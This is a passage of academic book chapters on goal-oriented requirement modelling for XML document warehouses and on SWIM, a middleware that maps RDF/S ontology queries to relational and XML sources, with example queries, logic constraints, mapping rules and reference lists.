the Publ_Institute is the stronger component due to the fact that the list of authors to be retrieved is determined based on the given institute value. Figure 9a shows how the case of searching based on a specified value is modelled, and Figure 9b shows how the actual notation is implemented according to the requirement’s values.
XDW requirement model, while Figure 8b shows how the actual notation is implemented according to the requirement’s values. It is important to note the direct connection amongst the high dimension level and the document level.
Requirement 2: List of Full Authors’ Details Based on Given Institute Name
Requirement 3: List of Conference Names Sorted Chronologically With Cross-Reference to Authors’ Details
It is required for all authors’ details to be listed according to their associated institute, which for this requirement we use “La Trobe University.” A simple association between the two documents, Publ_Authors and Publ_Institute, enables us to extract the required data. This case is a demonstration of an outcome derived from a query search based on a specific value from one document, and extracts all values from another document, which indicates a dependent relationship. Here both document types (Figure 3a) are implemented (section on Document Level) of which
This requirement is slightly more complex than the previous cases so far. This can be broken down further to simplify the process of gathering the required information. Firstly, the list of conference names (requirement 1) is a straightforward search, which evolves within the Publ_Conference document. It is then required for the list to be displayed chronologically, which indicates that the subject value factor (SVF) applies in this case and takes the element value “Yr_Year”
Figure 9. Figures 9(a) and 9(b): Requirement for list of authors’ details originating from “LaTrobe University” Di e si
e el High Level Requirement
High Dimension Level
1
1
# XML Document
1
1
1
1 D cu e t e el
Author List based on given institute name
1
XML Document Elements
CV
a Re uirement otation to retrieve entire document list ased on specific search context value
590
Publ Institute Inst Name 1
1
Context Value
# Publ Authors
1 1
1
1
XML Document
1
strai t e el
1
1
LaTrobe CV University
Re uirement notation implemented
Goal-Oriented Requirement Engineering for XML Document Warehouses
of document “Year”. A third component to this requirement is to also include cross-referencing to authors’ details, which are to be retrieved from the document Publ_Authors. If we refer to complete xFACT diagram (Figure 4), it is indicated that the search is not bound to be only within documents with direct connections amongst them. Instead, at times it may be necessary to go through several intra-connections with external documents to obtain the required values. In Figure 10a in the high-level requirement, the symbol of sort and merge appears, meaning that the outcome is a result of merging two requirements where one or both has/have been sorted. Figure 10b also shows how a document list is retrieved based on a selected element’s attribute, then sorted based on a SFV and finally combined with another document list. The arrow between the documents is again present, as the extracted authors’ details must
correspond to the related conference. The concept of requirement elicitation is performed in this case. We are able to decompose the high level requirement “Conference name list sorted chronologically with cross reference to author details” into two smaller sub-requirements, “Author list” and “Chronological conference list”, which may also prove valuable information when considered either solely or in combination with several other requirements. The approach of decomposing components aids in a better understanding of the context at hand and discovering important factors, which may have not been initially exhibited.
CONCLUSION AND FUTURE WORK Requirement engineering (RE) explores the ob-
Figure 10. Figures 10(a) and 10(b): Chronological listing of conference names with cross-reference to authors’ details High Dimension Level
Di e si
1
e el
1
1
1
Sub-Requirement
1
1
XML Document
#
1 Chronological Conference List
Author List 1
1
1
1
1
1
Sub-Requirement
D cu e t e el
Conference Name List sorted chronologically with cross reference to author details
High Level Requirement
1
Publ_Authors XML Document Elements
1
1
1
XML Document
#
Publ_Conference Conf_Name 1
1
strai t e el
SFV Subject Factor Value
a Re uirement notation of sort and merge document list
1
Yr_Year
SFV
Re uirement notation implemented
591
Goal-Oriented Requirement Engineering for XML Document Warehouses
jectives of various stakeholders and the activities carried out by the system. In regard to system objectives and system functionalities, in this chapter we examined one of the existing approaches — specifically the goal-oriented approach as illustrated in Dardenne et al. (1993). Generally, goal-oriented approaches until now have been mainly directed to assist in the development of software systems, as opposed to focussing on document warehouses involving XML-embedded structures. Based on this, we obtained and broadened the notion of this goal-modelling approach to XML document warehouses (XDW) to promote their structural design by identifying the data warehouse dimensions and the nature of the fact repository. We introduced concepts from our previous work (Nassis et al., 2004, 2005a, 2005b), where we presented a coherent way to integrate a conceptual design methodology to build a native XDW, which includes the XML FACT (xFACT) repository and the Virtual Dimensions (VDims). At this stage we concentrated only on the aspect of the data warehouse structure and design. Given the architecture of the XDW which consists of three levels: (1) Requirement level, (2) XML warehouse conceptual level and (3) Logical level, we focus on the first level by proposing the XDW requirement model. The main themes of our methodology are to: (1) capture requirements early in the design process; (2) understand the current requirements and further elicit these to promote new requirements; (3) illustrate the mapping of each stated requirement into a corresponding dimension of the XML document warehouse (XDW); (4) certify that the information required for the xFACT repository can be assembled from the information available in the XDW; and (5) ensure that the information necessary to construct a dimension is available or can be obtained from the xFACT repository. We identified the main characteristics comprising the requirement model and then proceeded to the precise and detailed terminology of the
592
components. Using as a basis the system context of our case study (Conference Publications), we extracted a number of sample requirements and applied these to our XDW requirement model in order to illustrate the concepts presented throughout. In the chapter we emphasized the importance of requirement validation and the availability of the necessary data that aid to requirement fulfilment. A significant issue that still needs to be addressed is checking for the consistency of requirements. This can be achieved by adding an enhanced annotation that will promote a basis for verifying requirement consistency. This process involves two major factors: (a) ensuring that the requirement presentation has sufficient annotation to capture all the constraints in a precise manner, and (b) the development of an algorithm that is capable of carrying out such consistency verification, specifically dealing with inheritance and recursion. One avenue that could be pursued is the use of a language such as Object Constraint Language (OCL) to annotate the requirements. Clearly, there are several more subject matters that deserve investigation. First, the development of formal semantics that automate the mapping between XML data and XDW schema will define views more precisely and hence support the incremental update of materialized views. Nowadays, the major challenge for any level of semi-structured data is its ability to be effectively searched. Given that the amount of content expands across an organization, locating specific resources becomes progressively more complex and time-consuming. Therefore, investigating performance issues upon query execution in relation to accessing the XDW will prove valuable. A significant aspect is the implementation of the XDW requirement modelling approach, which can be achieved by building a well-formulated empirical study. Also to be explored is the construction of a critical case study to evaluate and validate the application of the XDW requirement model for XML document warehouses (XDWs).
Goal-Oriented Requirement Engineering for XML Document Warehouses
REFERENCES Abelló, A., Samos, J., & Saltor, F. (2001, November). Understanding facts in a multidimensional object-oriented model. Paper presented at the Fourth International Workshop on Data Warehousing and OLAP (DOLAP 2001), Atlanta, GA (pp. 32-39). Blazewicz, J., Kubiak, W., Morzy, T., & Marek, R. (2003). Handbook on data management in information systems. Berlin; New York: SpringerVerlag. Coad, P., & Yourdon, E. (1990). Object-oriented analysis (2nd ed.). Englewood Cliffs, NJ: Prentice Hall. Dardenne, A., Van-Lamsweerde, A., & Fickas, S. (1993). Goal-directed requirements acquisition. Science of Computer Programming, 20(1-2), 3-50. Dillon, T. S., & Tan, P. L. (1993). Object-oriented conceptual modelling. Australia: Prentice Hall. Elmasri, R., & Navathe, S. B. (2000). Fundamentals of database systems (3rd ed.). New York: Addison-Wesley. Fankhauser, P., & Klement, T. (2003, September 3-5). XML for data warehousing changes & challenges (extended abstract). Paper presented at the Fifth International Conference on Data Warehousing and Knowledge Discovery (DaWaK 2003), Prague, Czech Republic. Feng, L., Chang, E., & Dillon, T. S. (2002). A semantic network-based design methodology for XML documents. ACM Transactions on Information Systems, (TOIS), 20(4), 390-421. Feng, L., Chang, E., & Dillon, T. S. (2003). Schemata transformation of object-oriented conceptual models to XML.International Journal of Computer Systems Engineering (CSSE), 18(1), 45-60.
Feng, L., & Dillon, T. S. (2003). Using fuzzy linguistic representations to provide explanatory semantics for data warehouses. IEEE Transactions on Knowledge and Data Engineering (TOKDE), 15(1), 86-102. Golfarelli, M., Maio, D. & Rizzi, S. (1998). The dimensional fact model: A conceptual model for data warehouses. International Journal of Cooperative Information Systems (IJCIS), 7(23), 215-247. Guttag, J. V., & Horning, J. J. (1993). Larch: Language and tools for formal specification. New York: Springer-Verlag. Jacek, B., Wieslaw, K., Tadeusz, M., & Rusinkiewicz, M. (Eds). (2003). Handbook on data management in information systems. Berlin; New York: Springer. Jacobson, I. (1995). The use case construct in object-oriented software engineering. In John M. Carroll (Ed.). Scenario-based design: Envisioning work and technology in system development (pp. 309-336). New York: John Wiley & Sons. Jarke, M., & Pohl, K. (1993, December). Establishing visions in context: Towards a model of requirements processes. Paper presented at the Fourteenth International Conference on Information Systems, Orlando, FL. Jones, C. B. (1990). Systematic software development using VDM (2nd ed.). NJ: Prentice Hall. Kimball, R., & Ross, M. (2002). The data warehouse toolkit: The complete guide to dimensional modelling (2nd ed.). New York: Wiley. Lubars, M., Potts, C., & Richer, C. (1993, January). A review of the state of the practice in requirements modelling. Paper presented at the First International Symposium on Requirements Engineering (RE 1993), San Diego, CA. Lucie-Xyleme. (2001, July 16-18). Xyleme: A dynamic warehouse for XML data of the web.
593
Goal-Oriented Requirement Engineering for XML Document Warehouses
Paper presented at the International Database Engineering & Applications Symposium (IDEAS 2001), Grenoble, France.
national Workshop on Ubiquitous Web Systems and Intelligence (UWSI 2005), Colocated with ICCSA 2005, Singapore.
Lujan-Mora, S., Trujillo, J., & Song I-Y. (2002a, September 30-October 4). Extending the UML for multidimensional modelling. Paper presented at the Fifth International Conference on the Unified Modeling Language and Its Applications (UL 2002), Dresden, Germany.
Nilsson, N. J. (1971). Problem solving methods in artificial intelligence. New York: McGraw Hill.
Lujan-Mora, S., Trujillo, J., & Song, I-Y. (2002b). Multidimensional modeling with UML package diagrams. Paper presented at the Twenty-First International Conference on Conceptual Modeling (ER 2002). McGraw, K., & Harbison, K. (1997). User centered requirements: The scenario-based engineering process. Mahwah, New Jersey: Lawrence Erlbaum Associates. Nassis, V., R.Rajugan, Dillon, T. S., & Rahayu, W. J. (2004, September 1-3). Conceptual design for XML document warehouses. Paper presented at the Sixth International Conference on Data Warehousing and Knowledge Discovery (DaWaK 2004), Zaragoza, Spain. Nassis, V., R.Rajugan, Dillon, T.S., & Rahayu, W. (2005a). Conceptual and systematic design approach for XML document warehouses. International Journal of Data Warehousing and Mining, 1(3), 63-87. Nassis, V., R.Rajugan, Rahayu, W., & Dillon, T.S. (2005b, July 25-28). A requirement engineering approach for designing XML-View driven, XML document warehouses. Paper presented at the Twenty-Ninth International Computer Software and Application Conference (COMPSAC 2005), Edinburgh, Scotland. Nassis, V., R.Rajugan, Rahayu, W., & Dillon, T.S. (2005c, May 9-12). A systematic design approach for XML-View driven web document warehouses. Paper presented at the First Inter-
594
Olle, T. W., Hagelstein, J., MacDonald, I. G., Rolland, C., Sol, H. G., Van Assche, F. J. V. et al. (1988). Information systems methodologies: A framework for understanding. New York; Reading, MA: Addison-Wesley. OMG-UML™ (2003). Unified Modeling Language™ (UML) Version 1.5, Specification. Object Management Group (OMG). Pokorny, J. (2002, June 3-6). XML data warehouse: Modelling and querying. Paper presented at the Fifth International Baltic Conference (Baltic DB & IS 2002), Talinn, Estonia. Rahayu, W. J., Dillon, T. S., Mohammad, S., & Taniar, D. (2001, August 21-24). Object-relational star schemas. Paper presented at the Thirteenth IASTED International Conference on Parallel & Distributed Computing and Systems (PDCS 2001), Anaheim, CA. Rajugan, R, Chang, E., Dillon, T. S., & Feng, L. (2003, September 1-5). XML views: Part I. Paper presented at the Fourteenth International Conference on Database and Expert Systems Applications (DEXA 2003), Prague, Czech Republic. Rajugan, R, Chang, E., Dillon, T. S. & Feng, L. (2004, November 2-6). XML views, part II: Modelling conceptual views using XSemantic nets. Paper presented at the Thirtieth Conference of the IEEE Industrial Electronics Society (IECON 2004), Workshop & Special Session on Industrial Informatics, S. Korea. Rajugan, R, Chang, E., Dillon, T. S., & Feng, L. (2005, May 24-28). XML views, Part III: Modeling XML conceptual views using UML. Paper presented at the Seventh International Confer-
Goal-Oriented Requirement Engineering for XML Document Warehouses
ence on Enterprise Information Systems (ICEIS 2005), Miami, FL.
Spivey, J. M. (1992). The Z notation — A reference manual (2nd ed.). NJ: Prentice Hall.
Rahayu, W. J., Chang, E., Dillon, T. S., & Taniar, D. (2002). Aggregation versus association in object modeling and databases. Paper presented at the Seventh Australasian Conference on Information Systems, Hobart, Tasmania.
Trujillo, J., Palomar, M., Gomez, J., & Song, I-Y. (2001, December). Designing data warehouses with OO conceptual models. IEEE Computer Society, “Computer”, 66-75.
Rolland, C., & Prakash, N. (2000). From conceptual modelling to requirements engineering. Special issue of Annals of Software Engineering on Comparative Studies of Engineering Approaches for Software Engineering, 10(1-4), 51-176. Royce, W. W. (1970, August 25-28). Managing the development of large-scale software: Concepts and techniques. Paper presented at the Western Electronic Show and Convention (WesCon), LA. Rumbaugh, J. R., Blaha, M. R., Lorensen, W., Eddy, F., & Premerlani, W. (1991). Object-oriented modelling and design. Englewood Cliffs, NJ: Prentice Hall.
W3C-XML. (2004, February 4). Extensible markup language (XML) 1.0. (3rd ed.). Retrieved February 20, 2004, from http://www.w3.org/XML/ W3C-XQuery. (2004, November 2003). XQuery 1.0: An XML query language. Retrieved November 10, 2003, from http://www.w3.org/TR/xquery W3C-XSD. (2004). XML schema. Retrieved February 5, 2004, from http://www.w3.org/XML/ Schema Xyleme. (2001). Xyleme XML content management and business document management system. Retrieved December 10, 2004, from http://www. xyleme.com/ Yourdon, E. (1989). Modern structured analysis. Englewood Cliffs, NJ: Prentice Hall.
This work was previously published in Processing and Managing Complex Data for Decision Support Systems, edited by J. Darmont and O. Boussaid, pp. 28-62, copyright 2006 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
595
596
Chapter 2.10
Mediating RDF/S Queries to Relational and XML Sources I. Koffina Institute of Computer Science & University of Crete, Greece G. Serfiotis Institute of Computer Science & University of Crete, Greece V. Christophides Institute of Computer Science & University of Crete, Greece V. Tannen University of Pennsylvania, USA
ABSTRACT Semantic Web (SW) technology aims to facilitate the integration of legacy data sources spread worldwide. Despite the plethora of SW languages (e.g., RDF/S, OWL) recently proposed for supporting large-scale information interoperation, the vast majority of legacy sources still rely on relational databases (RDB) published on the Web or corporate intranets as virtual XML. In this article, we advocate a first-order logic framework for mediating high-level queries to relational and/or XML sources using community ontologies expressed in a SW language such as RDF/S. We describe the architecture and reasoning services
of our SW integration middleware, termed SWIM, and we present the main design choices and techniques for supporting powerful mappings between different data models, as well as reformulation and optimization of queries expressed against mediator ontologies and views.
INTRODUCTION A cornerstone issue in the realization of the semantic Web (SW) vision is the achievement of large-scale interoperability among multiple information sources spread worldwide. In order to capture source semantics in a machine process-
Mediating RDF/S Queries to Relational and XML Sources
able way, various ontology-based formalisms have been recently proposed (e.g., RDF/S (Manola & Miller, 2004), OWL (Harmelen & McGuiness, 2004)). However, the vast majority of existing legacy data are not yet in RDF/S or any other SW language (Lee & Goodwin, 2005). As a matter of fact, most of the data are physically stored in relational databases (RDB) and they are actually published on the Web as virtual XML. SW applications, however, require to view such data as valid instances of a virtual RDF/S ontology for a specific domain of discourse and to be able to manipulate them with high-level query and view languages (e.g., RQL (Karvounarakis, Alexaki, Christophides, Plexousakis, & Scholl, 2002) or RVL (Magkanaraki, Tannen, Christophides, & Plexousakis, 2003)). Such an ontology offers an intuitive conceptual interface to express queries, which can be easily reused and refined (compared to the relational or XML data models). Therefore, we need an expressive and flexible SW middleware to either publish RDB data directly as RDF, or republish XML as RDF, or—even better—be capable of doing both. A decade of experience with information integration architectures based on mediators (Cluet, Delobel, Simeon, & Smaga, 1998; Levy, Rajaraman, & Ordille, 1996; Papakonstantinou, Garcia-Molina, & Widom, 1995) suggests that it is highly beneficial to avoid costly intermediate data migrations, as well as to (semi)automatically generate such systems from succinct formal specifications, mapping directly local data to mediator ontologies (or schemas). This greatly enhances the maintainability and reliability of the publishing systems in an environment of often revised and shifting requirements.
MOTIVATING EXAMPLE Let’s assume two sources providing fine-art information as seen in Figure 1: the lower left handside represents a relational database (art.db), while the
lower right handside represents an XML document (art.xml) whose content is described by a DTD or an XML schema. In particular, art.db consists of three tables1: Artist(Name, Year of Birth, Nationality) that stores information about artists, Museum(Name, Address, Country) that stores information about museums, and Artifact(Title, Creator, Kind, Museum) that stores information about artifacts, their creator, and exhibition place. Moreover, document art. xml contains information about museums and their collections (of either paintings or sculptures). Each collection comprises artifacts along with information about their creator (either under the form of artist elements or references when they are introduced elsewhere in the document). On the top of Figure 1, we consider a publicly available RDF/S ontology in the cultural domain. This ontology is represented as a directed graph whose nodes denote the classes (e.g., Artist, Artifact) and edges denote the properties (e.g., Creates). The domain of a property is always a class (drawn as an oval), while the range may be a class or a literal (drawn as a rectangle). Subsumption relationships may be defined for both classes (e.g., Painter is a subclass of Artist) and properties (e.g., Paints is a subproperty of Creates). In this article, we propose a semantic Web integration middleware (SWIM) for virtually integrating relational and XML sources using RDF/S ontologies as depicted in Figure 1. In order to specify our data publishing services and reformulate on-the-fly mediator queries expressed against the RDF/S ontologies according to the syntax, structure, and semantics of local sources (see Table 1 for the translation of a query returning artifacts that are exhibited in the museum of Louvre), we rely on a uniform and expressive logic framework termed semantic Web logic framework (SWLF). More precisely, the main contributions of SWIM are: •
Logic framework: We advocate a first-order logic (FOL) representation of heterogeneous data models such as RDF/S, XML, and
597
Mediating RDF/S Queries to Relational and XML Sources
Figure 1. Overview of the SWIM architecture
Table 1. The queries for the local sources and the one for the mediator ontology RQL SELECT x FROM {x}Exhibited.Denom{z} WHERE z = “Louvre” SQL
SELECT a.Title FROM Artifact a WHERE a.Museum= “Louvre”
XQuery FOR $var0 in document(“art.xml”)// Museum FOR $var1 in $var0/@Name FOR $var2 in $var0//Artifact/Title WHERE $var1/text()= “Louvre” RETURN $var2/text()
598
Mediating RDF/S Queries to Relational and XML Sources
•
•
relational models (unlike existing SW middlewares Bizer, 2003; Cruz, Xiao, & Hsu, 2004; Klein, 2002; Korotkiy & Top, 2004; Reif, Jazayeri, & Gall, 2004; Xiao & Cruz, 2004) coercing data under a single model, namely RDF/S or OWL). In particular, we provide a uniform framework for capturing the semantics of specific ontologies and sources schemas involved in a SWIM mediator under the form of disjunctive embedded dependencies (DEDs) (Deutsch, 2002). DEDs are proven to be quite useful for capturing both RDF/S class (or property) subsumption relationships, as well as alternative mappings from sources schemas to the same RDF/S ontology fragments. Mapping rules: We rely on linear datalog (non-recursive datalog without negation) for specifying how a fragment (i.e., view) of a mediator ontology can be populated, on demand, with the data available in relevant local sources. Mapping rules, also interpreted as DEDs, adopt a GLAV approach (Friedman, Levy, & Millstein, 1999) to reconciliate the schematic, structural, and semantic discrepancies arising between the mediator and the sources, by both expressing an RDF/S ontology in terms of the local (XML or relational) schemas (i.e., GAV like Bizer (2003), Lehti and Fankhauser (2004), and Miklos & Sobernig, (2005)) and vice versa (i.e., LAV like Amann, Beeri, Fundulaki, and Scholl (2002), Benatallah, Hacid, Paik, Rey, and Toumani (2005), (Chen, Wu, Wang, and Mao (2006b), and Fundulaki, 2002)). These mappings are able to match any fragment (i.e., a view) of the RDF/S ontology to any view over the relational sources or any XML document fragment. Query mediation: We provide a sound and complete algorithm for reformulating expressive RQL/RVL queries/views issued against a virtual RDF/S ontology into optimal queries tailored to the syntax, schema,
and semantics of local sources. In particular, we rely on well-established semantic query optimization techniques (i.e., Chase/Backchase (Deutsch, Popa, & Tannen, 1999)) to determine a maximally-contained rewriting. Intuitively, such a rewriting approximates the best possible answer of the original query, which can be obtained given the set of the available rules that map the local sources to the mediator ontology. To the best of our knowledge, no other SW mediation systems have addressed reformulation issues for unions of conjunctive RDF/S queries in the presence of constraints (both at the mediator ontology and source schemas) under the form of DEDs.
SWIM LOGIC FRAMEWORK We advocate a logic-based framework that supports a semantic Web middleware for reformulating RQL queries addressed to RDF/S ontologies. This framework, termed semantic Web logic framework (SWLF), consists of first-order logic (FOL) predicates along with a set of appropriate constraints under the form of disjunctive embedded dependencies (DEDs). Definition 1. A disjunctive embedded dependency is a FOL formula of the following general ⎡ ( x ) → ∨l ∃ y ' ( x, y ) ⎤ x ∀ form: i i i ⎥ where x , yi are ⎢⎣ i =1 ⎦ tuples of variables and φ, φi’ are conjunctions of relational atoms of the form R(ω1, ..., ωl) and equality atoms of the form ω=ω’, where ω1, ..., ωl, ω, ω’ are variables or constants; φ may be the empty conjunction.
First-Order Logic RDF/S and XML Representation The FOL representation of an RDF/S ontology and description base consists of six predicates (see Table 2) and the following set of disjunction-free DEDs 2:
599
Mediating RDF/S Queries to Relational and XML Sources
Table 2. First-order logic predicates for RDF Predicate CLASS PROP C_SUB P_SUB C_EXT P_EXT
•
• • •
• •
•
•
600
Type Set Set Set Set Set Set
Every resource in the extent of a class implies the existence of the corresponding class: ∀c,x C_EXT(c,x) → CLASS(c). The subclass relationship relates classes:∀a,b C_SUB(a,b) → CLASS(a) ∧ CLASS(b). The subclass relationship is reflexive: ∀c CLASS(c) → C_SUB(c,c). The subclass relationship is transitive: ∀a,c,e C_ SUB(e,c) ∧ C_ SUB(c,a) → C_SUB(e,a). The subclass relationship is antisymetric: ∀a,c C_SUB(a,c) ∧ C_SUB(c,a) → a=c. The domain and range of every property is a class: ∀a,p,b PROP(a,p,b) → CLASS(a) ∧ CLASS(b). The domain and range of every property is unique: ∀a,p,b,c,q d PROP(a,p,b) ∧ PROP(c,q,d) ∧ p=q → a=c ∧ b=d. In a valid RDF description schema the domain (range) of every subproperty is subsumed by the domain (range) of its superproperty: ∀a,p,b,c,q,d P_SUB(q,p) ∧ PROP(a,p,b) ∧ PROP(c,q,d) → C_SUB(c,a) ∧ C_SUB(d,b).
Description CLASS(c) iff c is a class PROP(a,p,b) iff p is a property having class a as domain and class b as range C_SUB(c,a) iff class c is a (direct or not) subclass of class a P_SUB(p,q) iff property p is a (direct or not) subproperty of property q C_EXT(c,x) iff resource x is in the proper extent (is a direct instance) of class c P_EXT(x,p,y) iff the ordered pair (x,y) (formed from resources x, y) is in the proper extent (is a direct instance) of property p
•
In a valid RDF description base the subject/object resources in every statement are (direct or indirect) instances of the property’s domain/range classes: ∀a,p,b,x,y PROP(a,p,b) ∧ P_ EXT(x,p,y) → ∃c,d C_SUB(c,a) ∧ C_SUB(d,b) ∧ C_EXT(c,x) ∧ C_EXT(d,y).
It should be stressed that, compared to the RDF/S semantics given in Hayes (2004), SWLF (i) distinguishes between the different RDF/S abstraction layers (data, schema, and metaschema), (ii) enforces that the domain and range of properties are always defined and unique, (iii) does not allow the existence of cycles in the class and property hierarchies, (iv) states that the set inclusion of the domain and range are preserved for specialized properties, and (v) requires that in each RDF statement the subject and object resources are (direct or not) instances of the domain and range classes of the property, respectively. These additional constraints are employed to effectively reason over queries/views (and not over data as in Hayes (2004)), while better clarifying
Mediating RDF/S Queries to Relational and XML Sources
the semantics of classes and properties in the mappings. Apart from the previous set of constraints capturing the semantics of the RDF/S data model, there exist two additional sets of constraints pertaining to a particular RDF/S ontology. The first3 provides only a partial knowledge of the ontology in the sense that it captures the existence of the RDF/S ontology’s classes, properties, and subsumption hierarchies, and includes constraints involving the predicates CLASS, PROP, C_SUB, and P_SUB. For example, for the RDF/S ontology given in Figure 1, the following constraints declare the existence of a class called Artist and a property called Creates with domain Artist and range Artifact, and the fact that Painter is a subclass of Artist, and that Paints is a subproperty of Creates: CLASS(Artist),PROP(Artist,Creates,Artifact), C_ SUB(Painter,Artist), & P_SUB(Paints,Creates)
The other set of constraints4 provides a complete knowledge of the mediator RDF/S ontology (see Figure 1). In particular, it states all the classes, properties, as well as their subsumption relationships5 as follows: •
Both sets of constraints are important to ensure the soundness and completeness of the core algorithms that we will present in the next section. In a similar way, we capture the semantics of the XML data sources: we consider a set of SWLF predicates and a set of DEDs preserving the semantics of XML data hierarchies. Briefly, these constraints (for details see Deutsch (2002)) ensure that (i) every child relationship is also a descendant relationship, (ii) the descendant relationship is reflexive, transitive, and antisymmetric, (iii) every XML document has only one root element, which cannot be descendant of another node, (iv) the child/descendant relationship is defined between two nodes, (v) the nodes have only one label and content, (vi) every node has only one parent, (vii) between two nodes with a child relationship there is no other node, and (viii) between two ancestors of a node there should exist a descendant relationship. Finally, the FOL representation of the relational data is straightforward: every source relation is a new SWLF predicate and the integrity constraints (if any) are DEDs defined over these predicates.
RDF/S Query Patterns and Their Translation into SWLF In our work, we are interested in translating the navigation/filtering patterns of classes (e.g., $c{x; $d}) and properties (e.g., {x; $c}@{y; $d}) supported by expressive RDF/S query languages such as RQL (Haase, Broekstra, Eberhart, & Volz, 2004). It is worth mentioning that these core RQL patterns can’t be expressed to the emerging SPARQL6 standard unless the involved inference rules (i.e., RDF/S Semantics (Hayes, 2004)) are fully materialized for a given RDF/S schema (Serfiotis, Koffina, Christophides, & Tannen, 2005). Definition 2. An RQL conjunctive query is a FOL formula of the following form:
601
Mediating RDF/S Queries to Relational and XML Sources
Q(u ) : −..., Ei (ui ),..., um = un
and after the substitution of the patterns with the SWLF predicates we get:
where u is a tuple of variables or constants, Ei( ui )’s are class/property patterns and um=un’s are equalities between variables and/or constants. Each ui involves any subset of class ($ci and $di ), property (@pi), and resource (xi and yi) variables. The RQL conjunctive queries must be safe (i.e., their variables must be range restricted as for relational queries) (Abiteboul, Hull, & Vianu, 1995). The union of RQL conjunctive queries is defined analogously to the union of relational conjunctive queries with the difference of using query patterns instead of relational predicates. As can be seen in the following example, the translation of an RQL query into an equivalent one, which is expressed in SWLF FOL predicates is rather straightforward.
Example 1. Assume the following RQL query returning the artifacts exhibited in the Louvre museum: SELECT x FROM {x}Exhibited{y}, {y}Denom{z} WHERE z = “Louvre”
By replacing the constants found in the patterns with variables and adding the corresponding equalities we get: SELECT x FROM {x}@p1{y}, {y}@p2{z} WHERE z = “Louvre” and @p1 = Exhibited and @p2 = Denom
This query can be rewritten in the form of an RQL conjunctive query as follows: ans(x) :- {x}@p1{y}, {y}@p2{z}, z = “Louvre”, @p1 = Exhibited, @p2 = Denom
602
SWIM MAPPING RULES Mapping rules aim to resolve various heterogeneity aspects arising when interpreting data from the relational or XML sources as instances of the mediator RDF/S ontology. In this section we formally define the mapping rules and discuss their expressiveness. Definition 3. The general form of a SWIM mapping rule is a FOL formula:
φRVL ( x ) : −φRe l ( x′) , or φRVL ( x ) : −φ XML ( x′) where φRVL ( x ) is a conjunctive RVL view over the mediator ontology, φRe l ( x′) is a conjunctive query over a relational database source, φ XML ( x′) is a conjunctive path query over an XML source, and finally x ⊆ x′ . The view clauses appearing at the head of the mapping rules are under the form C(x) or P(x, y) (or equivalently in SWLF, C_EXT(C, x) and P_EXT(x, P, y) respectively) defines the direct extent of a class C or a property P. The predicates of φRel have the form R(attr1, …, attrn), where R is the name of a source relation and attr1, …, attrn are variables or constant values. The predicates of φ XML are essentially an expressive fragment (excluding only ordering and navigation with wildcards (*) or ancestor axes) of XPath 2.07 primitives under the SWLF syntax. Apart from the aforementioned predicates, in the body of a mapping rule may also exist equalities or special relational atoms. These atoms represent functions (e.g., for string handling—concat, split,
Mediating RDF/S Queries to Relational and XML Sources
etc.), that enhance mappings expressiveness (e.g., to construct unique URIs populating classes). They are non-interpreted in the sense that they are handled only during the final query translation and not during query reformulation phase (as will be discussed next). Example 2. Given the RDF/S ontology and the local sources presented in Figure 1, we can establish the mappings illustrated in Table 3. For example, for Painting(x) (a) in case of relational to RDF/S mapping, the instances of class Painting (i.e., resource URIs) are obtained by the column
Title in table Artifact if column Kind is equal to “Painting”, and (b) in case of XML to RDF/S mapping, the instances of class Painting (i.e., resource URIs) are obtained by the content of element Title, whose father Artifact is descendant of a Collection, whose child Kind is equal to “Painting”. Note that
in the XML to RDF/S mappings, variables are binded as follows: •
One variable in the case of an absolute XPath expression, which represents the content of the final node (e.g., {//Collection}(c))
Table 3. Mappings between the local sources and the RDF/S ontology Relational to RDF/S: Artifact(x) :- Artifact(x, c1, k1, e1). Painting(x) :- Artifact(x, c1, k1, e1), k1 = “Painting”. // The instances of the property Paints are the pairs of resources whose ids are the values of the //attribute Artist and attribute Title in the Artifact table respectively, if the attribute Kind is equal to //“Painting.” Paints(x,y) :- Artifact(y, x, k1, e1), k1 = “Painting.” Exhibited(x,y) :- Artifact(x, c1, k1, y). //The instances of the property Denom are the pairs of resources whose ids are the values of the //attribute Name in the Museum table. In this case resource id coincides with museums’ name. Denom(x,y) :- Museum(y, a1, o1), x=y. Museum(x) :- Museum(x, a1, o1). Cubist(x), Paints(x,y) :- Artifact(y, x, k1, e1), e1 = “Pablo Picasso Museum”. XML to RDF/S: Artifact(x) :- {//Artifact/Title}(x). Painting(x) :- {//Collection}(c), {./@Kind}(c, k1), {.//Artifact/Title}(c,x), k1 = “Painting”. // The instances of the property Paints are the pairs of resources whose ids are the values of the //attribute Artist Name and element Artifact Title, respectively, when Artist is child of Artifact and //Artifact is descendant of a Collection whose attribute Kind Collection whose attribute //Kind is equal to “Painting”. Paints(x,y) :- {//Collection}(c), {./@Kind}(c, k1), {.//Artifact}(c,a), {./Title}(a,y), {./Artist/@Name}(a,x), k1 = “Painting.” Exhibited(x,y) :- {//Museum}(m), {./@Name}(m,y), {.//Artifact/Title}(m,x). Denom(x,y) :- {//Museum}(m), {./@Name}(m,y), x=y. Museum(x) :- {//Museum/@Name}(x).
603
Mediating RDF/S Queries to Relational and XML Sources
•
Two variables in the case of a relative XPath expression -the first variable indicates the starting node of the path while the second represents the content of the path’s end (e.g., {./@Kind}(c, k1))
As has been already stated, SWIM also represents the mapping rules as DEDs (see Definition 1). Each mapping is interpreted by two constraints, as follows:
∀x ∃ψ [φ XML or Rel ( x ,ψ ) → φRVL ( x )]
(1)
∀x [φRVL ( x ) → ∃ψφ XML or Rel ( x ,ψ )]
(2)
For example, the first mapping of Table 3 is interpreted by the following two constraints: ∀x, c1, k1, e1 [Artifact(x, c1, k1, e1) → C_ EXT(Artifact,x)], and ∀x [C_EXT(Artifact,x) → ∃ c1, k1, e1 Artifact(x, c1, k1, e1)].
In the case when two or more mappings have the same head (i.e., instantiate the same ontology view) we create a constraint of the form (1) for each mapping rule, while we create unique constraint of the form (2) for all of them:
∀x [φRVL ( x ) → ∨ (∃ψ iφ XML or Rel ( x ,ψ i ))] (2′) Now let’s assume that in art.db cubists are the painters whose artifacts are exhibited in the “Pablo Picasso Museum.” In order to populate the class Cubist we should define a GLAV mapping with head: “Cubist(x), Paints(x,y)” (see Table 3). Given these mapping rules (whose head is essentially a conjunctive RVL view) we are able to extract information regarding each individual clause. For instance, the mapping for “Cubist(x), Paints(x,y)” provides also information about cubists (“Cubist(x)”) and thus, ignore the information
604
